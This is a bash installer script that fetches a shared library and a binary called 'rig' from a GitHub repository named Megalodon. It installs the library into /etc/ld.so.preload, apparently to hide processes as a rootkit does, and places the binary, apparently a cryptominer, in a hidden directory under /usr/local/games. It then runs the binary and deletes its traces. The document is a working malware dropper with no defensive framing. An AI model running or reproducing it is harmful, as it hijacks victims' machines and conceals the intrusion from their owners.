#!/bin/bash
mkdir /tmp/megalodon;
mkdir /usr/local/games/.mega;
apt-get install wget screen -y 1>/dev/null ;

if [ -s /usr/bin/wget ];
	then LDR="wget" ;
else apt update && apt upgrade -y && apt install wget screen -y && LDR="wget" && ATTACH="screen" ;
fi


$LDR https://github.com/0x-raafet/Megalodon/raw/52792cfb57c1679b89796dd18ef42ed511598d70/libprhid.so -O /tmp/megalodon/libprhid.so;
$LDR https://github.com/0x-raafet/Megalodon/raw/main/rig -O /tmp/megalodon/rig;
chmod +x /tmp/megalodon/* ;
cp /tmp/megalodon/libprhid.so /usr/local/lib/;


echo "/usr/local/lib/libprhid.so" >> /etc/ld.so.preload;



cp /tmp/megalodon/rig /usr/local/games/.mega/;
rm -rf /tmp/megalodon;
$ATTACH /usr/local/games/.mega/rig